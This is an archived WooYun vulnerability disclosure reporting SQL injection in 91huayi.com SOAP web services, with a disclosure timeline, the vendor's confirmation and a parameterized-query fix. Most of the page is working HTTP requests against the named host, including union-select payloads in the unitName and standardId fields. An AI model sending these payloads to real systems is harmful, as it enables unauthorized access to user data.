乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-27: 细节已通知厂商并且等待厂商处理中 2015-10-29: 厂商已经确认,细节仅向厂商公开 2015-11-08: 细节向核心白帽子及相关领域专家公开 2015-11-18: 细节向普通白帽子公开 2015-11-28: 细节向实习白帽子公开 2015-12-13: 细节向公众公开
可以进行报错注入
0x01
POST /cardService.asmx HTTP/1.1Host: iccardwebservice.kjpt.91huayi.comContent-Type: text/xml; charset=utf-8Content-Length: 439SOAPAction: "http://tempuri.org/GetByUnit"<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetByUnit xmlns="http://tempuri.org/"> <KindID></KindID> <UnitName>a*</UnitName> <IsLogOut>false</IsLogOut> <UnitIDs>2</UnitIDs> </GetByUnit> </soap:Body></soap:Envelope>
unitname存在注入
百万用户数据
0x02
http://webservice.mbox.91huayi.com/service.asmx?op=GetDownloadCounts
0x03
http://webservice.mbox.91huayi.com/service.asmx?op=GetDownload_counts
0x04
POST /cardService.asmx HTTP/1.1Host: iccardwebservice.kjpt.91huayi.comContent-Type: text/xml; charset=utf-8Content-Length: 444SOAPAction: "http://tempuri.org/GetByUnitDetail"<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetByUnitDetail xmlns="http://tempuri.org/"> <unitName>' union all select 1,2,3,4,5,6,7,db_name()--</unitName> <isCreateCard>1</isCreateCard> </GetByUnitDetail> </soap:Body></soap:Envelope>
0x05
POST /cardService.asmx HTTP/1.1Host: iccardwebservice.kjpt.91huayi.comContent-Type: text/xml; charset=utf-8Content-Length: 409SOAPAction: "http://tempuri.org/GetOrderListBySId"<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetOrderListBySId xmlns="http://tempuri.org/"> <standardId>a' union all select NULL,db_name() --</standardId> </GetOrderListBySId> </soap:Body></soap:Envelope>
sqlmap跑下:
参数化查询
危害等级:中
漏洞Rank:10
确认时间:2015-10-29 17:39
谢谢!已提交业务部门处理。
暂无